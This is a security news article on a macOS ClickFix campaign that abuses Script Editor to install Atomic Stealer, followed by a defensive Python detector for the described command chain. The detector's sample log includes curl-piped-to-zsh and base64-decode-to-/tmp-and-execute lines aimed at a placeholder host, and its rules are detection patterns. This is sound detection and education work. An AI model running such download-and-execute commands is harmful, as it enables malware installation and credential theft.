New macOS Stealer Campaign Uses Script Editor in ClickFix Attack
Why It Matters
The abuse of a trusted macOS utility bypasses traditional command‑line warnings, raising the risk of credential theft for both consumers and enterprises. It underscores the need for stricter user education and platform‑level defenses against script‑based delivery vectors.
Key Takeaways
- Script Editor used to launch malicious AppleScript via applescript:// URLs.
- Attack delivers Atomic Stealer, stealing Keychain and crypto wallet data.
- No Terminal interaction required, evading the macOS Tahoe 26.4 warning.
- Campaign spreads through fake Apple disk‑cleanup webpages.
- Backdoor component provides persistent access for operators.
Pulse Analysis
Apple’s macOS has long benefited from a reputation for strong built‑in security, yet the platform’s own utilities can become attack surfaces when users trust them implicitly. Script Editor, a native tool for AppleScript and JavaScript for Automation, is now being weaponized through the “applescript://” URL scheme. By embedding a pre‑filled script in a seemingly innocuous web page, attackers sidestep the Terminal prompt that macOS Tahoe 26.4 introduced to warn against ClickFix commands, effectively turning a legitimate helper into a delivery conduit for malicious code.
The latest campaign, observed by Jamf, targets users searching for disk‑cleanup guidance on counterfeit Apple‑styled sites. When a victim clicks the malicious link, Script Editor opens and executes an obfuscated command chain that pipes a curl download into zsh, decodes a base64‑gzip payload, and writes a temporary Mach‑O binary to /tmp/helper. This binary, identified as Atomic Stealer (AMOS), harvests a wide array of sensitive assets—including Keychain passwords, cryptocurrency wallet extensions, browser autofill data, and credit‑card numbers—before installing a backdoor for long‑term persistence. The modular nature of AMOS, sold as malware‑as‑a‑service, enables rapid adaptation to new lures, making it a persistent threat across both consumer and enterprise environments.
For organizations, the incident highlights the importance of tightening endpoint policies around script execution and reinforcing user awareness about unsolicited system‑maintenance prompts. Deploying application‑allowlisting solutions that restrict Script Editor to signed scripts, coupled with network monitoring for anomalous curl‑zsh traffic, can blunt the initial download stage. Additionally, encouraging employees to verify the provenance of any macOS troubleshooting guide—preferably through Apple’s official support channels—reduces exposure to social‑engineering tricks. As attackers continue to exploit trusted macOS components, a layered defense strategy that blends technical controls with continuous education will be essential to safeguard critical credentials and data.
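The execution chain described in the analysis above (Script Editor launching a shell, curl piped into zsh, a base64‑gzip decode, a binary dropped under /tmp) and the "network monitoring for anomalous curl‑zsh traffic" recommendation both lend themselves to a simple host‑side heuristic. The following is an added example written for this page, not code from Jamf or any product: it scores process‑execution records against a handful of patterns and raises an alert when several of them line up in one record. The one‑record‑per‑line log format (`<timestamp> parent=<name> cmd=<command line>`), the sample lines, the rule weights and the alert threshold are all constructed assumptions; a real deployment would map the same rules onto whatever EDR or unified‑log telemetry is available.

```python
"""Heuristic detector for a ClickFix-style command chain on macOS.

Input records (constructed format for this example, not any vendor's log):
    <timestamp> parent=<parent process name> cmd=<full command line>
Each record is scored against independent rules; a record whose total
weight reaches the threshold is reported. Weights and threshold are
illustrative assumptions, not tuned values.
"""
import re
from dataclasses import dataclass

LINE_RE = re.compile(r"^(?P<ts>\S+)\s+parent=(?P<parent>.+?)\s+cmd=(?P<cmd>.*)$")

# Parent processes that should rarely be spawning shell download chains.
# Assumption: this is how Script Editor / osascript would appear as a parent.
SCRIPT_HOSTS = {"Script Editor", "osascript"}

# (rule name, pattern applied to the command line, weight)
CMD_RULES = [
    # curl output piped straight into an interpreter (the stage the page describes)
    ("curl_piped_to_shell", re.compile(r"\bcurl\b[^|]*\|\s*(zsh|bash|sh)\b"), 3),
    # base64 decode followed by gzip decompression in the same pipeline
    ("base64_gzip_decode",
     re.compile(r"base64\s+(-d|--decode|-D)[^|]*\|\s*(gunzip|gzip\s+-d)"), 2),
    # something written to or made executable under /tmp
    ("tmp_drop", re.compile(r"(?:>\s*|-o\s*|chmod\s+\+x\s+)/tmp/\S+"), 2),
]


@dataclass
class Record:
    ts: str
    parent: str
    cmd: str


def parse_record(line: str):
    """Parse one log line; return None for lines that do not fit the format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return Record(m["ts"], m["parent"], m["cmd"])


def score_record(rec: Record):
    """Return the list of (rule, weight) pairs that fire for this record."""
    hits = [(name, w) for name, pat, w in CMD_RULES if pat.search(rec.cmd)]
    if rec.parent in SCRIPT_HOSTS:
        hits.append(("script_host_parent", 2))
    return hits


def scan(lines, threshold: int = 4):
    """Scan log lines and return alert dicts for records at or above threshold."""
    alerts = []
    for line in lines:
        rec = parse_record(line)
        if rec is None:
            continue  # skip malformed lines rather than fail the whole scan
        hits = score_record(rec)
        score = sum(w for _, w in hits)
        if score >= threshold:
            alerts.append({"ts": rec.ts, "parent": rec.parent,
                           "score": score, "rules": [n for n, _ in hits]})
    return alerts


# Constructed sample records. The hostname example.invalid is a reserved
# placeholder, not an indicator from the campaign.
SAMPLE_LOG = [
    # benign: an admin downloading an archive to /tmp (one weak rule only)
    "2025-01-01T10:00:00Z parent=Terminal cmd=curl -sSL https://example.invalid/tool.tar.gz -o /tmp/tool.tar.gz",
    # stage 1 of the described chain: Script Editor spawning a shell that pipes curl into zsh
    '2025-01-01T10:00:05Z parent=Script Editor cmd=/bin/zsh -c "curl -s https://example.invalid/p | zsh"',
    # stage 2: decode a base64+gzip blob and drop a binary under /tmp
    '2025-01-01T10:00:06Z parent=zsh cmd=/bin/sh -c "echo H4sI... | base64 -d | gunzip > /tmp/helper; chmod +x /tmp/helper; /tmp/helper"',
    # benign: a dialog from an automation script, launched by Finder
    "2025-01-01T10:01:00Z parent=Finder cmd=/usr/bin/osascript -e 'display dialog \"hi\"'",
    # benign: osascript parent but harmless child; scores below threshold
    "2025-01-01T10:02:00Z parent=osascript cmd=/bin/ls /tmp",
    "this line is not in the expected format and is skipped",
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```

Each rule is weak on its own (administrators do download files into /tmp), which is why the detector alerts on the combination rather than on any single pattern; tune the weights and threshold against your own baseline before relying on it, and treat a Script Editor or osascript parent of a network‑fetching shell as the highest‑value signal, since that is exactly the Terminal‑free path the campaign relies on.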
New macOS stealer campaign uses Script Editor in ClickFix attack